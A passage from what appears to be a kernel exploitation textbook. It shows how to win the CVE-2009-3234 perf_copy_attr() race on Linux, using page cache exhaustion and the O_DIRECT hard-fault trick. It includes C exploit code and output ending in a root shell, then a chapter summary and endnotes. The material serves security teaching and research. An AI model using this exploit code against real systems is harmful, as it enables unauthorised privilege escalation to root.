Revisiting CVE-2009-3234

In the previous section, “Exploiting Linux Kernel Stack Buffer Overflows,” we introduced the perf_copy_attr() vulnerability and exploited it by combining the pointer arithmetic issue with the stack overflow. Let's now imagine that the code doing the pointer arithmetic was actually correct. Would we still be able to exploit the vulnerability? Let's check the code again:

for (; addr < end; addr += sizeof(unsigned long)) {
    ret = get_user(val, addr);                      [1]
    if (ret)
        return ret;
    if (val)                                        [2]
        goto err_size;
}
}
[…]
ret = copy_from_user(attr, uattr, size);            [3]

Given the check at [2], we would still be able to overwrite the stack with a given number of 0s, but, as we already saw, this would make the vulnerability dependent on our ability to map the NULL (0x0) page in the user address space, a privilege that is less and less common in today's operating systems. Looking at the code more closely, we see that it accesses the user-land data twice: once in the get_user() loop [1] and once at the end via copy_from_user() [3]. If this code executed alone and without being interrupted, it would be safe, since no user-land process would have a chance to modify the contents of the page between the get_user() loop and the final copy_from_user(). Unfortunately, both of these assumptions are wrong.

First, on an SMP system, each CPU executes independently from the others. While one CPU is busy with this kernel path, another one could be executing a user-land thread that simply modifies the buffer contents. A malicious program could create two threads and a zero-filled buffer, make one thread pass the buffer to the perf_copy_attr() function, and with a little timing, make the second thread modify the contents after they have been validated. The trick here would be to bind the two threads to two different CPUs and raise their priority as much as possible, making the second one wait a little bit before changing the contents. On a low-load machine, this would have a nearly 100 percent chance of success (with the synchronization among threads being the only issue).
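A minimal skeleton of this setup might look like the following. This is just an illustration, not the actual exploit: vuln_syscall() is a hypothetical stand-in for the path reaching perf_copy_attr(), and the priority tuning is omitted; the affinity calls are the Linux ones (pthread_setaffinity_np() requires _GNU_SOURCE).

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <string.h>

static char buf[4096];            /* zero-filled buffer passed to the kernel */
static volatile int go = 0;       /* kickstart flag for the second thread    */

static void pin_to_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
}

static void *changer(void *unused)
{
    pin_to_cpu(1);                /* run on the second CPU                    */
    while (!go)
        ;                         /* spin until the syscall is in flight;
                                   * a real exploit would also wait a little
                                   * so that validation passes first          */
    memset(buf, 0x41, sizeof(buf)); /* modify contents after validation       */
    return NULL;
}

int main(void)
{
    pthread_t t;

    pin_to_cpu(0);                /* keep the main thread on the first CPU    */
    pthread_create(&t, NULL, changer, NULL);
    go = 1;
    /* vuln_syscall(buf, sizeof(buf));  hypothetical vulnerable entry point   */
    pthread_join(t, NULL);
    return 0;
}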

As usual, though, let's not stop with the low-hanging fruit. Reliable exploitation on UP systems would be nice too. On UP systems there is no chance of having two different code paths running at the same time, and, as we learned in Chapter 3, our only chance is to force the kernel path to be scheduled off the CPU and our user-land thread to be picked up for execution. The trick here is to make the kernel go through the slow path of accessing the disk as a consequence of a page fault.

Let's take a step back. Linux (along with nearly all other modern operating systems) makes extensive use of demand paging. Each time a new memory mapping is inserted in the virtual address space of a process, the OS only marks the range as valid; it does not populate the page tables with the corresponding entries. Once the process accesses the memory range, a page fault is raised, and the page fault handler is responsible for creating the correct entries. The page fault handler's behavior in this case can be roughly summarized in a few simple steps:

  • Check if the requested access is valid (the address is in the process address space and there is no permission violation).

  • Look for the requested page in memory. The kernel keeps a cache of the physical pages currently in memory (pages frequently/recently accessed, pages recently freed), known as the page cache, to avoid going back to the disk for frequently accessed frames. As an example, think of the text of the libc library: nearly every spawned process on the system needs to access it, so it is considered a good optimization to keep it cached. The page cache is divided into the active cache (pages that are in the page tables of at least one process) and the inactive cache (pages that are unreferenced and were just recently released, kept around because there is a good chance they might be reaccessed; think of how many times you execute an editor, close it, and then remember an extra change you wanted to make). Due to the performance gain it provides (saving accesses to the disk), the page cache usually grows to use a good portion of the available RAM.

  • If the page is found in the page cache, make the page table entry point to it and return. The page fault is called, in this case, a soft fault. Rescheduling is unlikely to happen.

  • The page is not in the page cache, which means it is on the disk (either it has been swapped out or it is the first time it is accessed). The page fault handler starts an I/O transfer from disk to memory and puts the process to sleep. The scheduler picks a new process to execute. Once the I/O transfer is done, the faulting process is awakened and the page table entry is populated, pointing to the memory page where the disk contents have been copied. This kind of page fault is called a hard fault and is the kind of situation we want to generate to exploit the race condition on UP (and further improve our chances on SMP).
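Incidentally, we can observe this distinction from user land: the mincore() system call reports whether the pages backing a mapping are currently resident in memory. The following sketch (error checking omitted; count_resident_pages() is our own illustrative helper, not part of any exploit) counts how many pages of a file mapping would fault softly:

#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

/* Return the number of resident pages backing the first 'len' bytes of
 * 'path': a fault on a resident page is "soft"; on the others it is "hard". */
int count_resident_pages(const char *path, size_t len)
{
    long psz = sysconf(_SC_PAGESIZE);
    size_t npages = (len + psz - 1) / psz;
    unsigned char vec[npages];
    int fd = open(path, O_RDONLY);
    void *map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    int resident = 0;

    mincore(map, len, vec);       /* LSB of each byte: is the page in memory? */
    for (size_t i = 0; i < npages; i++)
        resident += vec[i] & 1;

    munmap(map, len);
    close(fd);
    return resident;
}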

Triggering a hard page fault is not complicated per se; it is enough to create a new mapping for a never-referenced file and make the kernel path access it. The problem, generally, is that we want some controlled contents in the file (e.g., to bypass the checks in the perf_copy_attr() example), and to achieve that, we need to access it ourselves earlier to write into it. At that point, the file pages will enter the page cache, and a subsequent access by the kernel will generate only a soft fault. This is not enough for a reliable exploit, so we need to find a solution.

Exhausting the Page Cache for Fun and Profit

The first, traditional solution to the problem comes from a simple observation: the page cache code needs to remove unreferenced or recently unused pages to make room for newly requested ones. This is pretty much mandatory for the correct functioning of the system. The good news is that we can take advantage of this property to force our page out of the page cache after we have written to it and before using it inside our exploit.

The idea is pretty simple and is the most classic of the exhausting/brute forcing approaches: allocate tons of pages until the page cache is full and inactive pages start to be evicted. cache_out_buffer() (shown below) implements exactly this technique to return a pointer to a buffer that has been evicted from the page cache. As usual, the full code (linux_race_eater.c) is available online at www.attackingthecore.com. The function is as follows:

void* cache_out_buffer(void *original, size_t size, size_t maxmem)
{
    int fd;
    size_t round_size = (size + PAGE_SIZE) & ~(PAGE_SIZE - 1);
    size_t round_maxmem = (maxmem + PAGE_SIZE) & ~(PAGE_SIZE - 1);

    unlink(FILEMAP);
    unlink(FILECACHE);

    /* Dump the buffer contents into a fresh file. */
    fd = open(FILEMAP, O_RDWR | O_CREAT, S_IRWXU);
    if (fd < 0)
        return NULL;
    write(fd, original, size);
    close(fd);

    /* Generate page cache pressure until the file pages are evicted. */
    if (fill_cache(round_maxmem) == 0)
        return NULL;

    fd = open(FILEMAP, O_RDWR | O_CREAT, S_IRWXU);
    if (fd < 0)
        return NULL;

    return mmap_file(fd, round_size);
}

This function takes as parameters the target buffer and its size, and uses these values to dump the buffer contents into a file. This operation brings the “buffer” contents (now contained within the freshly created file) into the page cache. At this point, we need to generate pressure on the page cache. There are a variety of ways to achieve that (basically, any form of extensive disk access would work; even a command such as find /usr -name "*" | xargs md5sum may do the trick on some systems), but the one we have decided to use here is based on generating a large (mostly empty) file on the disk and then accessing its “contents” page by page. The fill_cache() function shown below does exactly this.

int fill_cache(size_t size)
{
    int i, fd;
    char *page;

    fd = open(FILECACHE, O_RDWR | O_CREAT, S_IRWXU);
    if (fd < 0)
        return 0;

    lseek(fd, size, SEEK_SET);
    write(fd, "", 1);                                      [1]

    page = mmap_file(fd, size);                            [2]
    if (page == NULL) {
        close(fd);
        return 0;
    }

    for (i = 0; i < size; i += PAGE_SIZE) {
        *(page + i) = 0x41;
        if ((i % 0x1000000) == 0 && debug)
            system("cat /proc/meminfo | grep '[Ai].*ve'"); [3]
    }

    munmap(page, size);
    close(fd);
    return 1;
}

At [1], we write a single byte into the new file at a high offset specified by the size parameter (e.g., 0x40000000, 1GB). Since modern file systems support file holes, this creates a file that is virtually 1GB large yet takes up only a single disk block. Right after, at [2], we map the file with MAP_PRIVATE and start looping through it, hitting one page at a time, thus driving the allocation of a page inside the active cache at each iteration. If debug is enabled, the code also prints the active and inactive system caches [3]. We can monitor the effect of our code by looking at the output of the /proc/meminfo file. Here is an excerpt:

linuxbox$ cat /proc/meminfo
[…]
MemTotal:        1019556 kB
MemFree:          590844 kB
Buffers:            7620 kB
Cached:           267292 kB
SwapCached:        50904 kB
Active:            18364 kB
Inactive:         335036 kB
Active(anon):      10444 kB
Inactive(anon):    70592 kB
Active(file):       7920 kB
Inactive(file):   264444 kB

If we keep dumping this file while our exhausting code continues, we will see the Inactive entry shrink while the Active entry grows (as a consequence of our loop).

linuxbox$ cat /proc/meminfo
[…]
Active:           247000 kB
Inactive:         106400 kB
[…]

Eventually, our page will be evicted and we will be ready to map it again inside our exploit and use it to trigger the hard fault. This time, though, the file will have the desired payload inside.
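For instance, a hypothetical exploit could use the function along these lines (the 512MB budget is an arbitrary example value; it simply needs to exceed the size of the inactive cache on the target):

char payload[4096];
void *racer_buf;

memset(payload, 0x00, sizeof(payload));   /* contents that pass the checks */
racer_buf = cache_out_buffer(payload, sizeof(payload), 512 * 1024 * 1024);
if (racer_buf != NULL) {
    /* hand racer_buf to the vulnerable kernel path: its first
     * access will now generate a hard fault */
}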

Although this approach generally works, it can be very slow on a system with tons of RAM, and it might not be entirely reliable (e.g., if the process/user is allowed to commit only a limited amount of physical memory). If the operating system allows us to lock down a certain amount of physical RAM, we can improve our chances of success: it will be like playing the game on a system equipped with less RAM.

Tip

On OpenSolaris, for example, we can use the now deprecated Intimate Shared Memory (ISM) to achieve this goal. Pages shared through this mechanism are automatically locked down in memory. ISM pages can be created by passing the SHM_SHARE_MMU flag to shmat(). The use of ISM is now generally deprecated in favor of Dynamic Intimate Shared Memory (where pages need to be explicitly locked down via the privileged mlock()), but it is still available.
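A minimal sketch of such an ISM allocation (assuming a Solaris environment; get_locked_pages() is our own illustrative helper) might look like this:

#include <sys/ipc.h>
#include <sys/shm.h>

/* Attach an ISM segment: pages shared this way are kept locked in RAM. */
void *get_locked_pages(size_t size)
{
    void *p;
    int id = shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);

    if (id < 0)
        return NULL;
    p = shmat(id, NULL, SHM_SHARE_MMU);
    return (p == (void *)-1) ? NULL : p;
}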

Still, even with some locked-memory trick, this approach is suboptimal. Therefore, here is a technique that works on nearly all modern operating systems and allows us to obtain the same result in a simpler and 100 percent reliable manner: the Direct I/O technique.

The Direct I/O Technique

The problem with the traditional approach is that once the page enters the page cache we have a hard time getting it evicted. The Direct I/O technique solves this problem by preventing the page from entering the page cache in the first place, but still allowing us to change its contents! At this point, the first access will be the one from kernel land and will correctly trigger a hard fault.

Let's look at the (Linux) manpage for open():

O_DIRECT

Try to minimize cache effects of the I/O to and from this file. In general this will degrade performance, but it is useful in special situations, such as when applications do their own caching. File I/O is done directly to/from user space buffers. The I/O is synchronous, i.e., at the completion of a read(2) or write(2), data is guaranteed to have been transferred.

Whenever a file is opened with the O_DIRECT flag, read() and write() operations bypass (and thus don't fill) the page cache,QQ allowing us to write our payload into a file without having the pages stored in the cache. The good news is that, as we said, we can forget that long, tedious, and not totally reliable process of exhausting the inactive cache. Needless to say, we are going to use this technique to exploit the perf_copy_attr() race condition, but here we will demonstrate it through a simple proof of concept. You can find the complete code (o_direct_race.c) online at www.attackingthecore.com. Let's look at the key part of it.

volatile int check, s_check, racer = 0;
[…]
int main(int argc, char *argv[])
{
    […]
    fd_odirect = open(argv[1], O_RDWR|O_DIRECT|O_CREAT, S_IRWXU);   [1]
    fd_common  = open(argv[1], O_RDWR|O_CREAT, S_IRWXU);            [2]

    write(fd_odirect, align_data, 1024);                            [3]
    addr = mmap_file(fd_common, 1024);                              [4]

    start_thread(racer_thread, NULL);                               [5]

    racer = check = 0;
    tsc_1 = __rtdsc();
    s_check = check;
    racer = 1;                                                      [6]
    uname((struct utsname *)addr);                                  [7]
    tsc_2 = __rtdsc();

    if (check != s_check)
        printf("[**] check Changed Across uname() before=%d, after=%d\n",
               s_check, check);
    else
        printf("[!!] check unchanged: Race Failed\n");

    printf("[**] syscall accessing \"racer buffer\": TSC diff: %ld\n",
           tsc_2 - tsc_1);
}

static int racer_thread(void *useless)                              [8]
{
    while (!racer)
        ;
    check = 1;
    return 0;
}

At [1] and [2], the code creates and opens a new file twice. The first open() uses the O_DIRECT flag while the second one avoids it. The net result is that we can now access the same file using two different file descriptors. We call the first one “Direct I/O descriptor” and the second one “traditional descriptor.”
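One caveat worth keeping in mind when reusing this trick: O_DIRECT transfers generally require the user buffer (and, depending on the kernel and file system, the file offset and length as well) to be aligned to the device's logical block size, commonly 512 bytes. This is presumably what the align_data buffer used below provides; a minimal sketch of obtaining such a buffer (alloc_direct_buffer() is our hypothetical helper, not part of the PoC):

#include <stdlib.h>

/* Allocate a buffer suitable for O_DIRECT I/O. 512-byte alignment is the
 * historical lower bound; the real requirement is device-dependent. */
void *alloc_direct_buffer(size_t size)
{
    void *buf = NULL;

    if (posix_memalign(&buf, 512, size) != 0)
        return NULL;
    return buf;
}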

At [3], the function calls the write() system call to write data into the file using the Direct I/O descriptor, thus bypassing the page cache entirely. Later, at [4], the function maps the file in memory using the traditional descriptor and starts the racing thread. The code of the racing thread, launched at [5], is shown at [8] and is pretty simple: it just tries to change the value of the check variable. If you look at the code, the racer thread does not attempt the change until the racer variable is set to a nonzero value, which is what the main thread does at [6], right before calling the uname() system call at [7]. Right before and right after this call, the TSC (time stamp counter) is read to measure how much time passed in between.
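The __rtdsc() helper is not shown in the excerpt; a plausible x86 implementation (an assumption on our part, as the actual helper lives in the full source) simply reads the time stamp counter via the rdtsc instruction:

static inline unsigned long long __rtdsc(void)
{
    unsigned int lo, hi;

    /* Read the CPU time stamp counter: EDX holds the high 32 bits,
     * EAX the low 32 bits. */
    __asm__ __volatile__ ("rdtsc" : "=a" (lo), "=d" (hi));
    return ((unsigned long long)hi << 32) | lo;
}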

Once uname() returns, we check the value of check to see if the race effectively happened and, if so, how long it took before the syscall terminated. This will give us a perfect base for future exploits: racer_thread() will be replaced by our “updating” thread, and uname() by a call to the vulnerable kernel path. Let's run the code on a UP machine. Since only one process can run at a time, if the value of check has changed when we come back, it means we won the race condition. The TSC diff will give us further hints regarding how much “time” we have to play our racing games.

linuxbox$ ./o_direct_race ./test.txt
[**] Executing Write Through O_DIRECT…
[**] O_DIRECT sync write() TSC diff: 72692549                       [1]
[**] Starting Racer Thread …
[**] Value Changed Across uname() (passing “racer buffer”) b=0, a=1
[**] syscall accessing "racer buffer": TSC diff: 37831933           [2]

The Direct I/O write, as we can see at [1], takes quite some time. It is likely that a rescheduling occurred while we were waiting for the I/O to the disk to complete. This is good news: the implementation is correct (synchronous) and does not return until the data is on the disk. At [2], we see that our race with uname() succeeded, and we have a hard page fault to thank for that. The diff time is long enough to suggest an access to disk (assuming, say, a 2GHz TSC, roughly 38 million cycles translate to about 19 ms, in line with disk latency).

Exploiting CVE-2009-3234 on UP the Direct I/O Way

The key point of this technique is that it is applicable to nearly all modern operating systemsRR (RDBMSes run everywhere…), so let's just see an example of it in action with the perf_copy_attr() vulnerability. To successfully apply the technique we need to take care of a few details while writing the exploit:

  • The buffer on which we plan to race needs to be big enough to trigger the overflow and trash a few more bytes after the return address.

  • We need to divide the buffer into two adjacent memory mappings:

    • An anonymous mapping, filled with zeros, that spans most of the “buffer”

    • A final extra chunk mapping a file from the disk, also filled with zeros, written via the Direct I/O technique

Figure 4.8 should help us visualize this two-part buffer.


Figure 4.8 Two-part buffer for the perf_copy_attr() race condition.

The reason for this layout is to successfully pass the sequence of post-get_user() checks (each verifying that the copied value is 0) and then trigger a hard fault during the last one. At this point, our user-land thread should be rescheduled and have a chance to modify the anonymous mapping with the exploitation payload before copy_from_user() accesses it. Once again, we are going to see only the key functions of the exploit here; for the full exploit (CVE-2009-3234-iodirect.c), point your browser to www.attackingthecore.com.

static long _page_size;

static unsigned long prepare_mapping(const char *filestr)
{
    int fd, fd_odirect;
    char *anon_map, *private_map;
    unsigned long *val;

    fd_odirect = open(filestr,                                      [1]
                      O_RDWR|O_DIRECT|O_CREAT, S_IRUSR|S_IWUSR);

    anon_map = mmap(NULL, _page_size,                               [2]
                    PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    memset(anon_map, 0x00, _page_size);

    val = (unsigned long *)anon_map;
    write(fd_odirect, val, _page_size);

    fd = open(filestr, O_RDWR);                                     [3]
    private_map = mmap(anon_map + _page_size,                       [4]
                       _page_size, PROT_READ|PROT_WRITE,
                       MAP_PRIVATE|MAP_FIXED, fd, 0);

    return (unsigned long)private_map;
}

In the preceding code, prepare_mapping() is responsible for creating the two-part buffer described earlier, and is the key function of the preparatory phase of this exploit. To compact the output, we have removed the error checks from the various syscalls, but they are available in the online copy; never underestimate the importance of making exploit code defensive. At [1], the function creates and opens the file for the last chunk in O_DIRECT mode, and at [2], it creates the anonymous mapping for the first part of the buffer. The anonymous mapping is used to fill the file with zeros via Direct I/O, and the file is then reopened at [3] to create a mapping right after the previous one at [4]. At this point, we are ready to trigger the vulnerability.

static volatile int racer = 0;

static int racer_thread(void *buff)
{
    unsigned long *p_addr = buff;
    int total = (BUF_SIZE - sizeof(unsigned long))
                / sizeof(unsigned long);
    int i = 0;

    while (!racer)                                                  [5]
        ;
    check = 1;

    for (i = 0; i < total; i++)                                     [6]
        *(p_addr + i) = (unsigned long)kernel_payload;

    return 0;
}

You should recognize our good friend racer_thread() here. It waits for the kickstart variable (racer) to change [5], and then copies [6] the address of the exploitation payload (the one we saw in the stack-based example) into the buffer passed as an argument. As you can imagine, this address will be the one created by prepare_mapping(), as the following function shows:

#define MAP_FILE_NAME "./perfcount_bof_race"

int main(int argc, char *argv[])
{
    […]
    racer_buffer = prepare_mapping(MAP_FILE_NAME);

    perf_addr = racer_buffer - BUF_SIZE +                           [7]
                sizeof(unsigned long) * POINTER_OFF
                - sizeof(struct perf_counter_attr);
    ctr = (struct perf_counter_attr *)(perf_addr);

    start_thread(racer_thread,                                      [8]
                 (void *)(perf_count_struct_addr
                          + sizeof(struct perf_counter_attr)));
    sleep(1);

    ctr->size = BUF_SIZE;
    ctr->type = 0xFFFFFFFFUL;

    racer = 1;                                                      [9]
    syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL);
    […]
}

First, the racer_buffer is created via prepare_mapping(). The semi-magic calculation at [7] makes sure the stack overflow reaches the saved instruction pointer and overwrites a few bytes after it (contained inside the Direct I/O updated file). At [8], we create the racer thread, and at [9], we switch the flag on which it waits (racer), right before triggering the issue by invoking the perf_counter_open() system call. The rest of the exploit (basically the stack-recovery and privilege-escalating payload) is the same as the code presented in the stack exploitation section, and so is the outcome once executed: a root shell.

linuxbox$ ./exp_perfcount_race
[**] commit_cred=0x0xffffffff81076570
[**] prepare_kernel_cred=0x0xffffffff81076780
[**] Anonymous Map: 0x7f2df3596000, File Map: 0x7f2df3597000
[**] perfcount struct addr: 0x7f2df3596f40
[**] Triggering the Overflow replacing the user buffer…
# id
uid=0(root) gid=0(root)
#

It is worth pointing out, once more, that the main vulnerability we exploited here is not strictly related to the race condition; rather, exploiting the race gave us a chance to bypass a common safeguard, the protection against mapping the NULL page.

Summary

After a lot of theory, it was definitely time for some practice. In this chapter, we covered the UNIX family, focusing on two of its members: Linux (mostly) and (Open)Solaris. After introducing the target operating systems and the debugging facilities available on each of them, we started our analysis of the steps presented in Chapter 3.

First we covered the execution step, where we discussed the development of a privilege-raising shellcode for the Linux operating system. The Linux case was particularly interesting because it gave us the opportunity to explore the two common ways for UNIX systems to associate privilege information with the process control block (a static structure member or a pointer to a dedicated structure), and to introduce the concept of more fine-grained permissions (Linux capabilities). In this section, we improved our payload, getting rid of static values and magic numbers in favor of runtime-deduced values. As a general rule, the less we depend on static or precompiled information, the more portable our shellcode will be among different releases of the same operating system and the better it will adapt to different configurations.

Abiding by our goal of analyzing methodologies rather than just premade code, we spent some time learning how to “discover” the building blocks of our shellcode by traversing various kernel functions and structures. The suggested approach involves starting from a system call that retrieves (or manipulates) privileges (in our case, getuid()) and following its implementation as a “guide” to develop our payload. Following this approach, you should be able to quickly piece together a working payload for any target operating system/implementation.

Equipped with a fully working shellcode, we moved on to analyze the various bug classes, covering the triggering step of each of them. As we said, our main focus was on the Linux operating system, especially because it offers a set of public, real (as opposed to “crafted”) vulnerabilities to play with. The set_selection() and perf_copy_attr() issues were our choice for SLUB, stack, and race condition examples.

Along with the Linux SLUB, we also covered the (Open)Solaris slab allocator implementation—this time with a crafted example, taking the opportunity to analyze in detail a different environment and look at the system that introduced the concept of a slab allocator. In the process, we applied what we learned about the kernel debugger and developed a proper shellcode for the (Open)Solaris system.

As we learned, triggering a vulnerability usually leaves the kernel in an inconsistent state, which could generate a crash/panic of the target system, making our exploitation efforts vain. To prevent this, our exploit/payload needs to carefully reset the trashed structures/kernel objects to keep the state stable. We looked at two approaches in this regard: for a small recovery, we just have our shellcode do the work; for a large/complex recovery, we try to keep things “stable enough” until we can load a dedicated kernel module to restore the problematic structures.

This chapter on Linux was only the first of our practical operating system chapters. Our analysis continues, first with Mac OS X (Chapter 5) and then with Windows (Chapter 6).

Endnotes

1. Keniston J, Panchamukhi PS, Hiramatsu M. Kernel probes (KProbes), http://www.kernel.org/doc/Documentation/kprobes.txt.

2. Rubini A, Corbet J. Linux Device Drivers, 2nd ed., 2001, O'Reilly Media, Inc.

3. CVE-2009-1046, set_selection() memory corruption, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046; 2009.

A In this case, it is one of our test boxes, so the high number of recompilations is not surprising.

B For example, at the time of this writing, Debian 4.0 (Etch) is still using either the 2.6.18 or 2.6.24 derived kernel; the Debian 5.0 (Lenny) kernel is derived from the 2.6.27 stable branch, Ubuntu 6.06 is based on a 2.6.15 kernel, and Ubuntu 8.10 is again based on the 2.6.27 branch.

C A good example is the kernel “heap” allocator. At the time of this writing, a few distributions still use the old SLAB allocator, while the majority ship with the SLUB allocator by default.

D Although here we focus on distinguishing kernels based on the uname -a output (which is generally a good way), different subsystems may also be identified through what they “export” to user land. We will see this on a case-by-case basis through the rest of the chapter.

E This convention is also generally followed by nondistribution patches. For example, a grsecurity patched kernel will show up as –grsec (e.g., 2.6.25.10–grsec).

F Both KDB and KGDB have, for a long time, been external patches.

G In this case, we use the term kprobes to refer to the base framework.

H This is necessary to restore the correct stack and registers for the original function and is due to the way jprobes are implemented. Interested readers can find more details about the implementation of the kprobes framework in the aforementioned Documentation/kprobes.txt file.

I http://kerneltrap.org/Linux/Kgdb_Light

J OpenSolaris.org General FAQs, http://hub.opensolaris.org/bin/view/Main/general_faq#opensolaris-solaris.

K Solaris Dynamic Tracing Guide, http://docs.sun.com/app/docs/doc/817-6223.

L Dynamic Instrumentation of Production Systems, Bryan M. Cantrill, Michael W. Shapiro, and Adam H. Leventhal, www.sun.com/bigadmin/content/dtrace/dtrace_usenix.pdf.

M McDougall R., Mauro J., and Gregg B. 2006. Solaris(TM) Performance and Tools: DTrace and MDB Techniques for Solaris 10 and OpenSolaris. Prentice Hall PTR.

N At the time of this writing, the DTrace framework supports a handful of providers and around 80,000 probes.

O The binary driver needs to be nonobfuscated and, among other things, compiled using the frame pointer (the FBT provider uses the frame-pointer-related instructions in the prologue as a signature). A large part of the NVIDIA driver is not “dtraceable” for this reason.

P Solaris Modular Debugger Guide, http://docs.sun.com/app/docs/doc/817-2543.

Q McKusick, M. K., Bostic, K., Karels, M. J., and Quarterman, J. S. 1996. The Design and Implementation of the 4.4BSD Operating System. Addison Wesley Longman Publishing Co., Inc.

R More precisely, 4.4 BSD-lite Release 2 is the last release and development of the OS has ceased.

S We do not show examples from other kernels, but at the time of this writing this is true for any 2.6 kernel version.

T http://www.grsecurity.net/~spender/enlightenment.tgz.

U “Attacking the Core: Kernel Exploitation Notes,” twiz and sgrakkyu, PHRACK 64, www.phrack.org/issues.html?issue=64&id=6#article.

V “Exploiting UMA, FreeBSD's kernel memory allocator,” argp and karl, www.phrack.org/issues.html?issue=66&id=8#article.

W CVE-2009-1046 set_selection() memory corruption, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046.

X Bonwick, J. 1994. “The slab allocator: an object-caching kernel memory allocator.” In Proceedings of the USENIX Summer 1994 Technical Conference on USENIX Summer 1994 Technical Conference - Volume 1 (Boston, June 6–10, 1994). USENIX Association, Berkeley, CA.

Y Bonwick, J. and Adams, J. 2001. “Magazines and vmem: extending the slab allocator to many CPUs and arbitrary resources.” In Proceedings of the General Track: 2002 USENIX Annual Technical Conference (June 25–30, 2001). Y. Park, Ed. USENIX Association, Berkeley, CA, 15–33.

Z The “previous” magazine at the CPU layer is an optimization to this approach. Since it will always be either full or empty, it is kept there and swapped with the current one in case it could fulfill the request. The current OpenSolaris implementation keeps three magazines at the CPU layer: a full one, an empty one, and a partially used (current) one.

AA If you're interested, creation of the various general-purpose caches occurs inside kmem_cache_init(), which calls kmem_alloc_caches_create().

BB In other words, when searching for vulnerabilities, it is common to hunt for kmem_alloc() (and its zeroing-content counterpart, kmem_zalloc()) calling paths.

CC Further details on compiling and installing the driver, along with the full source code, are available at www.attackingthecore.com.

DD Nonsanitized parameters used inside an ioctl() call are an extremely common case for kernel vulnerabilities.

EE Well, we actually could do it, but we would need the list of allocations and frees from boot time.

FF It's a dummy test module; no need to be picky here!

GG truss is a program that can track the system calls (with arguments and return values) executed by a program.

HH If that sounds cryptic, do not worry. Shortly, we will see our theory in practice with a few memory dumps that will, hopefully, make things clear.

II As usual, the full code is available at www.attackingthecore.com.

JJ Throughout this section, we use the term SLAB in uppercase to refer to the first Linux allocator, while we use the term slab in lowercase to generically refer to a series of contiguous physical pages that the allocator creates to manage a group of objects of the same size. The term slab thus applies to any of the allocators described in this section.

KK Larry H, “Linux Kernel Heap Tampering Detection,” PHRACK 66, www.phrack.org/issues.html?issue=66&id=15#article.

LL Christoph Lameter, “SLUB: The unqueued slab allocator V6,” http://lwn.net/Articles/229096/.

MM Note: 32 by 128 is 4,096, which reflects the typical size of one page frame. The reason 128 32-byte wide objects are available is that no extra metadata information needs to be kept in the slab.

NN Where “current” means, at the time of this writing, Linux versions earlier than 2.6.30. The offset at which the metadata is stored is tracked inside the page struct and may change in future releases.

OO kmem_cache_free() omits the check for a debatable optimization choice. The slab cache the object belongs to is passed as a parameter to kmem_cache_free(), so it is not necessary to derive it from the page structure (page->slab).

PP In the tiocl_houdini.c code this is implemented mostly by the start_listener() (server part) and the create_and_init() and connect_peer() (client part) functions.

QQ If you never had a chance to be thankful for database implementations, now is your chance. Big RDBMSes with their own cache optimization are the primary reason for the existence of this flag.

RR In fact, we will encounter this technique again in Chapter 6.
